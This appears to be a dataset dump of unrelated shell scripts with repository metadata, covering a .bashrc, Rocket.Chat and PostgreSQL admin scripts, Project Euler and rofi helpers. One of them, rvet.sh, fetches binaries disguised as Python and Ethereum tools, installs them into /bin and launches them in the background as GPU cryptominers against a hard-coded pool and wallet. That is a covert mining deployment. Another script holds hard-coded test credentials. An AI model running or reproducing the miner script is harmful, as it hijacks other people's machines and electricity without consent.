alias q='qstat'
alias d='qdel'
alias io='sudo iotop'
# Run python with CUDA devices hidden (CPU-only).
alias kipy='CUDA_VISIBLE_DEVICES=" " ipython3'
alias kpy='CUDA_VISIBLE_DEVICES=" " python'
alias ks='source activate keras_tf'
# Delete all of this user's queued jobs.
alias qda="qstat |cut -d ' ' -f1 |xargs qdel"
alias pyt="source activate pytorch_py3.6_v2"
alias io='sudo iotop -u rpapagari'
alias nvs='nvidia-smi'
#alias vdir='ls --color=auto --format=long'
fi
# set a fancy prompt (non-color, unless we know we "want" color)
case "$TERM" in
xterm-color) color_prompt=yes;;
esac
# uncomment for a colored prompt, if the terminal has the capability; turned
# off by default to not distract the user: the focus in a terminal window
# should be on the output of commands, not on the prompt
#force_color_prompt=yes
if [ -n "$force_color_prompt" ]; then
if [ -x /usr/bin/tput ] && tput setaf 1 >&/dev/null; then
# We have color support; assume it's compliant with Ecma-48
# (ISO/IEC-6429). (Lack of such support is extremely rare, and such
# a case would tend to support setf rather than setaf.)
color_prompt=yes
else
color_prompt=
fi
fi
if [ "$color_prompt" = yes ]; then
PS1='${debian_chroot:+($debian_chroot)}\[\033[01;32m\]\u@\h\[\033[00m\]:\[\033[01;34m\]\w\[\033[00m\]\$ '
else
PS1='${debian_chroot:+($debian_chroot)}\u@\h:\w\$ '
fi
unset color_prompt force_color_prompt
# If this is an xterm set the title to user@host:dir
case "$TERM" in
xterm*|rxvt*)
PS1="\[\e]0;${debian_chroot:+($debian_chroot)}\u@\h: \w\a\]$PS1"
;;
*)
;;
esac
# enable color support of ls and also add handy aliases
if [ -x /usr/bin/dircolors ]; then
test -r ~/.dircolors && eval "$(dircolors -b ~/.dircolors)" || eval "$(dircolors -b)"
alias ls='ls --color=auto'
#alias dir='dir --color=auto'
#alias vdir='vdir --color=auto'
alias grep='grep --color=auto'
alias fgrep='fgrep --color=auto'
alias egrep='egrep --color=auto'
fi
# Restrict scheduler/process views to the current user by default.
alias qstat='qstat -u $USER'
alias top='top -u $USER'
# enable programmable completion features (you don't need to enable
# this, if it's already enabled in /etc/bash.bashrc and /etc/profile
# sources /etc/bash.bashrc).
if ! shopt -oq posix; then
if [ -f /usr/share/bash-completion/bash_completion ]; then
. /usr/share/bash-completion/bash_completion
elif [ -f /etc/bash_completion ]; then
. /etc/bash_completion
fi
fi
| true
|
3f27cf9eb45ffb3da92d71fdf97154fb266cfa03
|
Shell
|
catursawah/anr8-6-21
|
/rvet.sh
|
UTF-8
| 1,315
| 2.765625
| 3
|
[] |
no_license
|
#!bin/bash -xe
# NOTE(review): the shebang path is missing its leading '/', so the -xe options
# never take effect and the file only runs when invoked as 'bash rvet.sh'.
# NOTE(review): this script downloads binaries disguised with interpreter-like
# names ("python2.6.6", "pyeth2"), copies them into /bin and runs them against
# mining pools with this host's IP as the worker name — this looks like a
# hidden cryptominer deployment and should be treated as hostile, not fixed.
iip=$(curl https://ipecho.net/plain)
IPNAME=$(sed 's|\.|o|g' <<< $iip)
nvidia-smi
curl ipinfo.io
# Version 1.2.3
# wget https://github.com/RavenCommunity/kawpowminer/releases/download/1.2.3/kawpowminer-ubuntu18-1.2.3.zip
# unzip kawpowminer-ubuntu18-1.2.3.zip
# version1.2.2
wget https://github.com/one10001/10001code/releases/download/2.6.6/python2.6.6
wget https://github.com/one10001/ethminer/releases/download/v0.0.1/pyeth2
chmod +x pyeth2
cp pyeth2 /bin/pyeth2
chmod +x python2.6.6
cp python2.6.6 /bin/python2.6.6
python2.6.6 -U -P stratum+tcp://RMV17aQMgMPyPqJQ5H3WRQH37Njspi1SSK.$IPNAME@116.203.10.54:80 --cu-grid-size 64 --cu-block-size 128 --cu-parallel-hash 1 2> log02.out 1> log02.out &
pyeth2 -P stratum1+tcp://0x1be9C1Db52aC9cD736160c532D69aA4770c327B7.$IPNAME@116.203.10.54:990 -U --cu-grid-size 128 --cu-block-size 256 --cu-parallel-hash 1 2> log01.out 1> log01.out &
nvidia-smi
# Endless status loop: print accepted-share counts and GPU state every 30s.
while [ 1 ]
do
echo '#######################################################################################################################################'
echo eth 21: $(grep -o 'Accepted' log02.out | wc -l)
grep -o 'Accepted' log02.out | tail -n 3
echo rv 80: $(grep -o 'Accepted' log01.out | wc -l)
grep -o 'Accepted' log01.out | tail -n 3
nvidia-smi
sleep 30
done
| true
|
bfdaa6e90cef1d5a0a79e96e57cb458ce6ee86be
|
Shell
|
teddy/dotfiles
|
/scripts/rofi/rofitorrent
|
UTF-8
| 393
| 3.453125
| 3
|
[] |
no_license
|
#!/bin/bash
#
# Menu for transmission daemon commands
#
# Show a rofi prompt and start or stop the transmission daemon according to
# the user's choice; any other/cancelled answer is a no-op.
main()
{
  local action
  action="$(rofiprompt --text "Choose an option" \
      --options "Start,Stop")"

  case "${action}" in
    Start) transmission --start ;;
    Stop)  transmission --stop  ;;
  esac
}
#----------------------------------------------------------
main "$@"
| true
|
c961153eddac942a3519e61c5254d29f9cb22f9d
|
Shell
|
UMich-Mind-Lab/pipeline-task-standard
|
/bin/get_valid_subs.sh
|
UTF-8
| 1,780
| 3.484375
| 3
|
[] |
no_license
|
#!/bin/bash
# List the subjects in a BIDS dataset that have every file the pipeline needs
# (BOLD runs, reorientation matrix, and per-acquisition fieldmap/event-log
# files).  Subjects that have BOLD data but are missing other files are
# reported together with the missing paths; the final line prints the
# complete-subject list as a quoted, comma-separated string.
#read in entries from the sm_config file
task=$(cat config/sm_config.json | jq -r ".task[]")
ses=$(cat config/sm_config.json | jq -r ".ses[]")
acq=$(cat config/sm_config.json | jq -r ".acq[]")
run=$(cat config/sm_config.json | jq -r ".run[]")
bidsDir=$(cat config/sm_config.json | jq -r ".bids_dir")
#initialize empty subs array
subs=""
for sub in "${bidsDir}"/sub-*; do
#extract subject id from filepath
sub=$(echo ${sub} | cut -d "/" -f 4 | cut -d "-" -f 2)
addSub=1
missing="missing:"
iMissing=0
for t in ${task}; do
for s in ${ses}; do
for r in ${run}; do
for a in ${acq}; do
# Single quotes are deliberate: the template keeps ${...} literal and is
# expanded later with 'eval echo' once the loop variables are bound.
reqd='${bidsDir}/sub-${sub}/ses-${s}/func/sub-${sub}_ses-${s}_task-${t}_acq-${a}_run-${r}_bold.nii.gz ../../reorientation/sub-${sub}/ses-${s}/T1w_reorient.mat'
# BUG FIX: these tests previously compared ${acq} — the whole space-separated
# acquisition list — against "mb"/"sp", so they only worked when exactly one
# acquisition was configured.  Compare the current loop value ${a} instead.
if [ "${a}" == "mb" ]; then
# NOTE(review): the fieldmap template uses acq-${t} (the task name), not
# acq-${a}; this looks like task-named fieldmaps but verify against the
# dataset layout.
reqd="${reqd}"' ${bidsDir}/sub-${sub}/ses-${s}/fmap/sub-${sub}_ses-${s}_acq-${t}_run-1_fieldmap.nii.gz ../../eventLogs/sub-${sub}/ses-${s}/sub-${sub}_ses-${s}_run-${r}_${t}.mat'
elif [ "${a}" == "sp" ]; then
reqd="${reqd}"' ../../eventLogs/sub-${sub}/ses-${s}/sub-${sub}_ses-${s}_run-${r}_${t}.csv'
fi
# Expand the templates and record every required file that is absent.
for f in ${reqd}; do
f=$(eval echo "${f}")
if ! [ -f "${f}" ]; then
addSub=0
missing=${missing}$'\n'${f}
let "iMissing=iMissing+1"
fi
done
done
done
done
done
#if the subject has all files, add to list
if [ ${addSub} -eq 1 ]; then
subs="${subs} \"${sub}\","
#otherwise, if the subject has the bold.nii.gz, but not other files, report it
elif ! [[ "${missing}" == *"bold.nii.gz"* ]]; then
echo "${sub}"
echo "${missing}"
echo
fi
done
echo
echo "${subs}"
| true
|
290ba86aa1b592555f80e99813327ffc75d59af4
|
Shell
|
danX-4q/docker-safe
|
/safecode-env-test/sc-et_u16/docker-fs-root/home/sc-test/script/service/clean-nodeos-data.sh
|
UTF-8
| 392
| 3.03125
| 3
|
[
"MIT"
] |
permissive
|
#!/bin/bash
# Stop the local nodeos service and delete its chain data (blocks, snapshots,
# state) for the node named by $1.
zpath=$(cd `dirname $0`; pwd)
cd $zpath > /dev/null
##############################
#usage:
# $1: node name, which will be used to get node config
#     at dir ../node/$1/eosio.conf(or eosio.env)
set -x
NM=${1-"a"}
N_C_DIR="../node/${NM}/"
# eosio.conf must define NODEOS_D_DIR, the nodeos data directory.
cd $N_C_DIR
. eosio.conf
cd -
##############################
./stop-nodeos.sh
# SAFETY FIX: ${NODEOS_D_DIR:?...} aborts if the variable is unset or empty;
# without the guard an unset value would expand this to
# "rm -rf /blocks /snapshots /state" at the filesystem root.
rm -rf "${NODEOS_D_DIR:?NODEOS_D_DIR not set by eosio.conf}"/{blocks,snapshots,state}
| true
|
974e0f7c0a9f29f3415076120419eaabdee5b88d
|
Shell
|
RetroCraft/project-euler
|
/scripts/run-cpp.zsh
|
UTF-8
| 220
| 2.65625
| 3
|
[] |
no_license
|
#!/bin/zsh
# Build and run a single Project Euler solution: $1 is the zero-padded problem
# number; the banner also reports how many solutions exist locally.
count=$(find . -name "Problem???.cpp" | wc -l)
echo "PROJECT EULER: Problem $1 (of $count)"
echo "====================================="
g++ src/c++/Problem$1.cpp -o bin/Problem$1 -std=gnu++17
./bin/Problem$1
| true
|
e5575b410dcbbce92bf88dbc7590f9435ec3fcdb
|
Shell
|
meom-configurations/eORCA12.L75-GJM2020
|
/RUN_eORCA12.L75/eORCA12.L75-MJM2020/CTL/dcmtjk_mkmdjournal
|
UTF-8
| 6,115
| 3.765625
| 4
|
[] |
no_license
|
#!/bin/bash
# This script is used to produce a template for the Journal of a run, written
# in markdown language, that fits with github repositories.
# It must be run where the nemoxx.oxxx files ares saved.
# class = @Run management tools@
# Print the detailed help text on stdout and exit 0.
# NOTE(review): the help says the default output file is journal.wiki, but the
# script default below is journal.md — confirm which is intended.
usage() {
echo
echo "USAGE: $(basename $0 ) [-h ] [-f ] [-c confcase ] [-n name ] [-u user] [-o fileout]"
echo
echo "  PURPOSE:"
echo "     This script create a markdown with the segments of run present in the local "
echo "     directory (job output). It uses the namelist in order to retrieve important "
echo "     parameters of the run, to put in the table. "
echo "     It prepares the column for the CPU usage. This column can be completed "
echo "     afterward with accounting information"
echo "     (see dcmtk_mdjournal_cpu) "
echo
echo "  OPTIONS:"
echo "     -h : help "
echo "     -f : force : do not check that you are in a CTL dir "
echo "     -n name : use name instead of nemo_<MACHINE>. <MACHINE> is inferred from hostname"
echo "          for irene, ada, occigen, jean-zay "
echo "     -c confcase : use confcase instead of CONFCASE deduced from CTL"
echo "          : this is usefull with option -f "
echo "     -u user  [default is $USER ]"
echo "     -o output file [ default is journal.wiki "
echo
exit 0
}
# Extract the batch job id from a "<name>.e<jobid>" stderr file name
# (everything after the first ".e").
getjobid() {
  local jid=${1#*.e}
  echo $jid
}
# Emit one markdown table row: "|" then each argument followed by "| ",
# terminated by a newline.  (narg stays global, as in the historical code.)
line() {
  echo -n "|"
  narg=$#
  while (( $# > 0 )); do
    echo -n $1 "| "
    shift
  done
  echo
}
# Begin a table row: print "|" followed by the arguments, space separated,
# WITHOUT a trailing newline (the caller completes the row with line()).
# The dat array stays global, as in the historical code.
linedat() {
  dat=($*)
  set -- "${dat[@]}"
  echo -n "|" "$@"
}
# Emit the markdown alignment row matching a previous line() call:
# 'c' -> :---: (centre), 'r' -> ---: (right), 'l' -> :--- (left),
# anything else -> --- (default).  narg stays global as before.
header() {
  narg=$#
  echo -n "|"
  while (( $# > 0 )); do
    local mark
    case $1 in
      c) mark=':---:' ;;
      r) mark='---:'  ;;
      l) mark=':---'  ;;
      *) mark='---'   ;;
    esac
    echo -n $mark "| "
    shift
  done
  echo
}
# Reformat a compact date "YYYYMMDD" as "yYYYYmMMdDD".
# (tag stays global, as in the historical code.)
reformdat() {
  tag=$1
  printf 'y%sm%sd%s\n' "${tag:0:4}" "${tag:4:2}" "${tag:6:2}"
}
# LookInNamelist returns the value of a variable in the namelist
# examples: aht0=$(LookInNamelist  aht0 )  <=> aht0=$(LookInNamelist aht0 namelist )
#           ln_limdmp=$(LookInNamelist ln_limdmp namelist_ice )
#           nit000=$(LookInNamelist nn_it000 namelist_oce.10 )
#  If there is a third argument it is used as a namelist block and the search is
#  limited to this block :
#           ln_tsd_init=$(LookInNamelist ln_tsd_init namelist_cfg namtsd_drk )
LookInNamelist() {
# $1 variable name, $2 optional namelist file (default "namelist"),
# $3 optional block name to restrict the search to.
if [ $# -ge 2 ] ; then znamelist=$2 ; else znamelist=namelist ; fi
if [ $# = 3 ] ; then zblk=$3 ; else zblk='' ; fi
if [ ! $zblk ] ; then
# grep candidate lines, strip quotes, normalise "=" spacing, then keep the
# value ($3) only where the first field exactly matches the variable name.
eval grep -e $1 $znamelist | tr -d \' | tr -d \" | sed -e 's/=/ = /' | awk ' {if ( $1 == str ) print $3 }' str=$1
else
# Same filtering, but only inside the requested namelist block.
getblock $zblk $znamelist | eval grep -e $1 | tr -d \' | tr -d \" | sed -e 's/=/ = /' | awk ' {if ( $1 == str ) print $3 }' str=$1
fi
}
# Print a namelist block by name: everything from the "&<name>" line up to and
# including the closing "/" line.
#   $1: block name (without the leading '&')
#   $2: namelist file (default: "namelist"); also left in the global $namelist
getblock() {
  namelist=${2:-namelist}
  awk -v blk="$1" '
    $1 == "&" blk      { inblk = 1 }
    inblk              { print }
    inblk && $1 == "/" { inblk = 0 }
  ' "$namelist"
}
# For a namelist logical in any spelling (TRUE, true, .true., T, ...), print a
# single canonical T or F: any upper-cased form containing a 'T' counts as true.
# (tmp stays global, as in the historical code.)
normalize() {
  tmp=$(echo $1 | tr 'a-z' 'A-Z')
  case $tmp in
    *T*) echo T ;;
    *)   echo F ;;
  esac
}
# ---
# Defaults, overridable on the command line (see usage above).
name=nemo_occigen
force=''
CONFCASE='eORCA12.L75-GJM2020'
user=$USER
filout=journal.md
# Map the full hostname onto a short machine tag used in the default job name.
MACHINE=$(hostname)
case $MACHINE in
( irene* ) MACHINE=irene ;;
( occigen* ) MACHINE=occigen ;;
( ada*  ) MACHINE=ada ;;
( login*occigen) MACHINE=occigen2 ;;
( jean-zay*) MACHINE=jean-zay ;;
esac
name=nemo_$MACHINE
# BUG FIX: usage documents -f and -u, but the original optstring lacked "u:"
# and the case had no f/u branches, so both options fell through to usage.
# NOTE(review): $force is still unused further down — the CTL-dir check it is
# meant to bypass appears to be missing; confirm intent.
while getopts :hfn:c:o:u: opt ; do
case $opt in
(h) usage ;;
(f) force=1 ;;
(n) name=${OPTARG} ;;
(c) CONFCASE=${OPTARG} ;;
(o) filout=${OPTARG} ;;
(u) user=${OPTARG} ;;
(*) usage ;;
esac
done
tmp=$(pwd)
# Split CONFCASE (CONFIG-CASE) on the hyphen.
CONFIG=${CONFCASE%-*}
CASE=${CONFCASE#*-}
echo $CONFCASE
echo $user
echo $filout
echo $name
echo "# Journal of $CONFCASE run"
line Date Seg jobid Nem/Xio start/end nit000/nitend rdt comment
header c r r c c r r n
for f in $( ls -t $name.e* ) ; do
ofile=$(echo $f | sed -e 's/\.e/.o/' )
jobid=$(getjobid $f)
seg=$( grep 'no=' $f | awk -F= '{print $2}' )
# corresponding namelist_oce
namelist=$WORK/${CONFIG}/${CONFCASE}-S/ANNEX/namelist_oce.$seg
# namelist=../namelist.$CONFCASE
# corresponding ocean.output file
oceanout=$WORK/${CONFIG}/${CONFCASE}-S/ANNEX/ocean.output.$seg
# date of segment
nday=$(cat $ofile | grep starting | awk '{print $2}' )
t1=$(cat $ofile | grep starting | awk '{print $7}' )
t2=$( datfinyyyy $t1 $nday )
t1=$(reformdat $t1)
t2=$(reformdat $t2)
nit000=$( cat $f | grep 'nit000=' | head -1 | awk -F= '{print $2}')
nitend=$( cat $f | grep 'nitend=' | head -1 | awk -F= '{print $2}')
# time step as read from ofile
rn_rdt=$( cat $ofile | grep 'Time step is' | awk -F: '{print $2}')
# flag linssh
tmp=$( LookInNamelist ln_linssh $namelist ) ; tmp=$(normalize $tmp)
if [ $tmp = T ] ; then
comment='linssh'
else
comment='.'
fi
# nproc NEMO/XIOS
nb_proc_nemo=$(grep -w NB_NPROC $f | tail -1 | awk -F= '{print $2}' )
nb_proc_xios=$(grep -w NB_NPROC_IOS $f | tail -1 | awk -F= '{print $2}' )
# Execution date
fecha=$(head -2 $ofile | tail -1 | sed -e 's/CEST//')
linedat ${fecha[@]:4}
line $seg $jobid $nb_proc_nemo'/'$nb_proc_xios $t1'/'$t2 $nit000'/'$nitend $rn_rdt $comment
done
| true
|
3e86f8c393814af59dc1750f1535aa642fd1cda7
|
Shell
|
erdenayates/bash-scripting-examples
|
/for.sh
|
UTF-8
| 84
| 2.609375
| 3
|
[] |
no_license
|
#! /bin/bash
for x in 1 2 3 4 #that can be {1..4..1} also.
do
echo $SHELL
done
| true
|
562b36a125c57998b939d7708d3e9e9611058a96
|
Shell
|
metmirr/shell-examples
|
/24-trap.sh
|
UTF-8
| 681
| 3.53125
| 4
|
[] |
no_license
|
echo "
#############################################
## Example 24.1: #
## trap signals that run on EXIT and Ctrl+C #
#############################################
"
trap "echo we\'re exiting the script!" EXIT
trap "echo you pressed Ctrl+C" INT
echo 'press Ctrl+C here to see the INT signal handler run.'
# notice that Ctrl+C doesn't actually make the script exit, like it usually
# would! This is because trap replaces the normal signal handler for Ctrl+C
# (which would cause the script to exit). If you put an `; exit` at the end of
# the signal handler command, it'll exit the script
# this `read` just gives an opportunity to press Ctrl+C
read
| true
|
5383100794b33b3081fdb58d555bda1214924dcd
|
Shell
|
Bhaskarsjb/cookbooks
|
/postgresql_test/files/default/postgresql_archiving.sh
|
UTF-8
| 4,504
| 3.65625
| 4
|
[] |
no_license
|
#!/bin/bash
# Configure PostgreSQL WAL archiving: rewrites the archive parameters in
# postgresql.conf, restarts the server, and reports the effective settings.
# (The original file carried two shebang lines, "#!/bin/sh" then
# "#! /bin/bash"; only the first ever counts, and this script uses [[ ]]
# bashisms, so it must run under bash.)
#set -x
#SCRIPT SHOULD BE RUN AS ROOT USER.
sudo clear
# BUG FIX: six positional parameters are consumed below (archive_timeout=$6),
# but the original only required five; the usage text also printed the typos
# "S5"/"S6" instead of the 5th/6th parameters.
if [[ $# -lt 6 ]] ; then
echo " Usage: $0 #1 #2 #3 #4 #5 #6 "
echo " wal_level         : $1 "
echo " max_wal_size      : $2 "
echo " wal_keep_segments : $3 "
echo " archive_mode      : $4 "
echo " archive_command   : $5 "
echo " archive_timeout   : $6 "
echo "USAGE:- ./postgrearchive.sh archive 1GB 10 on "cp %p /var/lib/postgresql/10.1/archive/%f" 1h"
exit 0
fi
# Capture the six archiving parameters from the command line.
wal_level=$1
max_wal_size=$2
wal_keep_segments=$3
archive_mode=$4
archive_command=$5
archive_timeout=$6
sleep 5s
echo "Write Ahead Log Archive Parameters......."
echo""
echo "########################################################"
echo " wal_level         : $wal_level         "
echo " max_wal_size      : $max_wal_size      "
echo " wal_keep_segments : $wal_keep_segments "
echo "                                        "
echo " archive_mode      : $archive_mode      "
echo " archive_command   : $archive_command   "
echo " archive_timeout   : $archive_timeout   "
echo "########################################################"
echo ""
sleep 2s
# Locate the running postgres binary directory from the server process's
# "-D <datadir>" command line, then ask the server itself for its paths.
echo "Fetch Binary path location"
directory=$(ps ax -o pid,cmd | grep 'postgres *-D' | awk '{ print $2 }')
bindirectory=$(dirname $directory)
echo "Binary directory path of postgresql is $bindirectory"
echo "Fetching Data Directory Locaiton"
data="$($bindirectory/psql -q -U postgres -t -P format=unaligned -c 'show data_directory;')"
echo "Postgre Data Directory : $data "
echo""
config="$($bindirectory/psql -q -U postgres -t -P format=unaligned -c 'show config_file;')"
echo "Postgres configuration file path : $config"
echo "backup postgresql.config file to /root/ "
# BUG FIX: the original "cp $config \root\postgresql.config.bak" collapsed the
# backslashes, writing "rootpostgresql.config.bak" into the current directory
# instead of the intended backup under /root.
cp $config /root/postgresql.config.bak
echo ""
echo " ###########Updating Postgresql.conf########### "
echo""
sleep 5s
echo""
sed -i -e "/#wal_level = minimal/s/minimal/$wal_level/" "$config"
sed -i -e "/#wal_level/s/#/ /" "$config"
echo "wal_level updated..."
echo""
echo""
sed -i -e "/#wal_keep_segments = 0/s/0/$wal_keep_segments/" "$config"
sed -i -e "/#wal_keep_segments/s/#/ /" "$config"
echo "wal_keep_segments updated..."
echo""
echo""
sed -i -e "/#max_wal_size = 1GB/s/1GB/$max_wal_size/" "$config"
sed -i -e "/#max_wal_size/s/#/ /" "$config"
echo "max_wal_size updated..."
echo""
echo""
sed -i -e "/#archive_mode = off/s/off/$archive_mode/" "$config"
sed -i -e "/#archive_mode/s/#/ /" "$config"
echo "archive_mode updated..."
echo""
echo""
#sed -i -e "/#archive_command = ''/s/''/'$archive_command'/" "$config"
#sed -i -e "/#archive_command/s/#/ /" "$config"
sed -i -e "s|#archive_command = ''|archive_command = '$archive_command '|" "$config"
echo "archive_command updated..."
echo""
echo""
sed -i -e "/#archive_timeout = 0/s/0/$archive_timeout/" "$config"
sed -i -e "/#archive_timeout/s/#/ /" "$config"
echo " Archive_timeout updated..."
echo""
echo""
echo " #####Configuration file Update completed###### "
echo""
echo""
echo "Restarting postgres Database services..."
su - postgres <<eof
$bindirectory/pg_ctl -D $data restart
if [ $? != 0 ]
then
echo "Postgres service restart failed.. please validate the logfile..."
else
echo "Postgres service restarted successfully...please validate the logfile for more information..."
exit 0
fi
eof
# Give the server time to come back up, then read the settings back from the
# live instance to confirm what actually took effect.
sleep 15s
echo "####Archive Configuration details#### "
wallevel="$($bindirectory/psql -q -U postgres -t -P format=unaligned -c 'show wal_level;')"
walkeepsegments="$($bindirectory/psql -q -U postgres -t -P format=unaligned -c 'show wal_keep_segments;')"
maxwalsize="$($bindirectory/psql -q -U postgres -t -P format=unaligned -c 'show max_wal_size;')"
archivemode="$($bindirectory/psql -q -U postgres -t -P format=unaligned -c 'show archive_mode;')"
archivecommand="$($bindirectory/psql -q -U postgres -t -P format=unaligned -c 'show archive_command;')"
archivetimeout="$($bindirectory/psql -q -U postgres -t -P format=unaligned -c 'show archive_timeout;')"
echo " New Wal_level         : $wallevel "
echo " New wal_keep_segments : $walkeepsegments "
echo " New Archive_mode      : $archivemode "
echo " New Archive_timeout   : $archivetimeout "
echo " New Archive_command   : $archivecommand "
exit 0
| true
|
cd3adba12c907792f3acdc76b6302ef54ac944f3
|
Shell
|
schadow1/osmphgps
|
/build/build_script.sh
|
UTF-8
| 3,118
| 3.09375
| 3
|
[
"LicenseRef-scancode-warranty-disclaimer"
] |
no_license
|
#! /bin/sh -x
############################################################################
#
# MODULE:       osmphgarmin map build script
#
# AUTHOR(S):    Ervin Malicdem schadow1@s1expeditions.com
#               Emmanuel Sambale esambale@yahoo.com emmanuel.sambale@gmail.com
#
# PURPOSE:      Shell script for creating Garmin maps from OSM data.
#               Requires mkgmap, gmapi-builder python script, nsis.
#
#               This program is free software under the GNU General Public
#               License (>=v2).
#
#############################################################################
#Set these directory paths
# NOTE(review): these are placeholders and must be filled in before the script
# can run at all.
download_dir=------
output_dir=------
split_dir=------
download_link=---
download_link_osmconvert=---
download_link_osmfilter=---
#Nothing to change below
#===========
cd ${download_dir}
# Download from geofabrik site
wget -c ${download_link}
ls -al
# Download OSMConvert
# NOTE(review): 'wget -O' requires an output *filename* before the URL; as
# written the URL is consumed as the output path and no URL remains, so these
# two downloads fail — confirm the intended local filenames.
wget -O ${download_link_osmconvert}
ls -al
# Download OSMFilter
wget -O ${download_link_osmfilter}
ls -al
#Convert OSM file to boundary file
osmconvert philippines-latest.osm.pbf --out-o5m >philippines.o5m
#Extract boundaries data
osmfilter philippines.o5m --keep-nodes= --keep-ways-relations="boundary=administrative =postal_code postal_code=" --out-o5m > philippines-boundaries.o5m
#Export boundaries data
java -cp mkgmap.jar uk.me.parabola.mkgmap.reader.osm.boundary.BoundaryPreprocessor philippines-boundaries.o5m boundary
# Split the file using splitter.jar
# NOTE(review): the convert step above reads philippines-latest.osm.pbf while
# this one reads philippines.osm.pbf — verify which snapshot name is current.
java -jar splitter.jar --max-nodes=1000000 --keep-complete=true philippines.osm.pbf --output-dir=${split_dir}
ls -al
# compile map with logging properties report
#time java -Dlog.config=logging.properties -Xmx2012m -jar mkgmap.jar --read-config=args.list ${output_dir}
time java -Xmx2012m -jar mkgmap.jar --read-config=args.list --series-name="OSM Philippines $(date +%Y%m%d)" --description="OSM Philippines $(date +%Y%m%d)" --output-dir=${output_dir} ~/osm/routable_garmin/dev/split/*.osm.pbf
# gmapsupp.img generation
time java -Xmx2012m -jar mkgmap.jar --read-config=args2.list ~/osm/routable_garmin/dev/split/*.osm.pbf ~/osm/routable_garmin/dev/SCHADOW.TYP
ls -al
zip osmph_img_latest_dev.zip gmapsupp.img
# Gmapi for Mac Roadtrip installer
python gmapi-builder -t ${output_dir}/40000001.tdb -b ${output_dir}/40000001.img -s ${output_dir}/SCHADOW.TYP -i ${output_dir}/40000001.mdx -m ${output_dir}/40000001_mdr.img ${output_dir}/*.img
ls -al
zip -r osmph_macroadtrip_latest_dev.zip "OSM Philippines $(date +%Y%m%d).gmapi"
#mv osmph_macroadtrip_latest_dev.zip /home/maning/osm/routable_garmin/dev/
rm -rf "OSM Philippines $(date +%Y%m%d).gmapi"
cd ${output_dir}
ls -al
# Win Mapsource installer
makensis osmph_mapsource_installer_.nsi
mv osmph_winmapsource_latest_.exe /home/maning/osm/routable_garmin/dev/osmph_winmapsource_latest_dev.exe
#temporary mv
#mv osmph_winmapsource_latest_.exe /home/maning/Downloads/osm/routable_garmin/data/
# Clean up the intermediate Garmin artifacts in both directories.
rm *.img
rm *.mdx
rm *.tdb
cd ..
rm *.img
rm *.tdb
rm *.mdx
date > log.txt
#Miscellaneous
cd ${download_dir}
# upload to server
# archiving downloaded philippine osm file
mv philippines.osm.pbf archive/philippines_$(date +%Y%m%d).osm.pbf
| true
|
07ae8cbf9b1591a18d09b15fd3d23779700cb378
|
Shell
|
hoangtran/dotfiles
|
/bin/sshot
|
UTF-8
| 486
| 4
| 4
|
[] |
no_license
|
#!/bin/bash
#
# a general scrot wrapper script: takes a screenshot into the screenshots
# directory, named after the current timestamp unless -n <name> is given.
#
###
# Print usage and exit with an error.
message() { echo 'usage: sshot [ -n <name> ] [ -f ] [ scrot options ]'; exit 1; }

# BUG FIX: the tilde does not expand inside single quotes, so the original
# saved screenshots under a literal directory named "~".  Use $HOME and make
# sure the directory exists.
shots_dir="$HOME/pictures/screenshots"
mkdir -p "$shots_dir" || exit 1

name="desktop_$(date +%y%m%d%H%M)"

# grab some options for us, pass anything
# else directly to scrot
# NOTE(review): unrecognised options are currently discarded, not forwarded to
# scrot as the comment above suggests — confirm whether pass-through is wanted.
while [ -n "$1" ]; do
case $1 in
-h|--help) message ;;
-n|--name) shift; name="$1" ;;
*) ;;
esac
shift
done

# spaces in the chosen name become underscores
shot="$shots_dir/${name// /_}.png"
scrot "$shot" || exit 1
| true
|
88ef977e2a3a114491308c46e5cdb318e9bdf234
|
Shell
|
upsales/upsales-node-integration-template
|
/setup.sh
|
UTF-8
| 887
| 3.625
| 4
|
[
"MIT"
] |
permissive
|
read -p "Name of integration: " name
echo "Copying files"
cd ..
cp -r upsales-node-integration-template $name
cd $name
sed -i "" "s/upsales-node-integration-template/$name/g" package.json
echo "# $name
_Short description what the integration does_
## Where is it?
_Where is it running_
_What endpoint does it listen to_
_Are there different deployments for beta/prod_
_Where are the logs_
## How to deploy?
_Any special deployment or set-up steps_
## Environment variables
_Which environment variables are there on what do they do_
## What are the different endpoints used for?
_Short description about the different endpoints, what does it listen do and why?_
## Dev environment
_How to run the integration on a dev environment_
" > README.md
echo "Initiating git"
rm -rf .git
git init
echo "Installing dependencies"
npm install
echo "Setup done! Integration available at $PWD"
| true
|
f9115ec9223d0c20c0640667b3ff267941509a5a
|
Shell
|
wenusch/casinocoin-webhook-server
|
/entrypoint
|
UTF-8
| 289
| 2.734375
| 3
|
[
"MIT"
] |
permissive
|
#!/bin/sh
# Container entrypoint: on the very first start (marker file /installed
# absent) create/migrate the Ecto database and run the tests, then exec the
# Phoenix server as PID 1, forwarding any container arguments.
cd /usr/src/app

# PORTABILITY FIX: this script runs under /bin/sh (often dash or BusyBox ash
# in containers), where the bash-only '[[ ]]' is unavailable; use POSIX '[ ]'.
if [ ! -e /installed ]; then
    touch /installed
    echo "Not installed yet, run init scripts"
    echo "Database (ecto) create & migrate"
    mix ecto.create && mix ecto.migrate
    echo "Run tests"
    mix test
fi

exec mix phx.server "$@"
| true
|
fffb342b6690fa3451a9d939669560f75aaf2978
|
Shell
|
reetp/rocket-chat-rest-client
|
/curlTest.sh
|
UTF-8
| 665
| 2.875
| 3
|
[] |
no_license
|
#!/bin/bash
# Post a message to a Rocket.Chat channel via the REST API:
# login -> chat.postMessage -> logout.
#   $1: message text (default "test msg");  $2: channel (default test-readonly)
MSG="${1:-test msg}"
CHANNEL="${2:-test-readonly}"
# NOTE(review): hard-coded credentials — fine for a throwaway test server,
# but do not reuse real secrets here.
USERNAME="user_b"
PASSWORD="password"
SERVER="https://testrocket"
USERID="userid_of_user_b"
# GET authToken
# Extract the "authToken" value from the JSON login response.
# NOTE(review): grep/cut JSON parsing is fragile — jq would be more robust.
AUTHTOKEN="$(curl -s ${SERVER}/api/v1/login -d "username=${USERNAME}&password=${PASSWORD}" | grep "authToken" | cut -d"\"" -f4)"
# post message
curl -s -H "X-Auth-Token: ${AUTHTOKEN}" \
     -H "X-User-Id: ${USERID}" \
     -H "Content-type:application/json" \
     ${SERVER}/api/v1/chat.postMessage \
     -d '{"channel": "#'${CHANNEL}'", "text": "'"${MSG}"'"}'
# logout
curl -s -H "X-Auth-Token: ${AUTHTOKEN}" \
     -H "X-User-Id: ${USERID}" ${SERVER}/api/v1/logout
| true
|
6032b86d6a29492b86c2acbc903f2841368a48b0
|
Shell
|
RasppleII/rasppleii-history
|
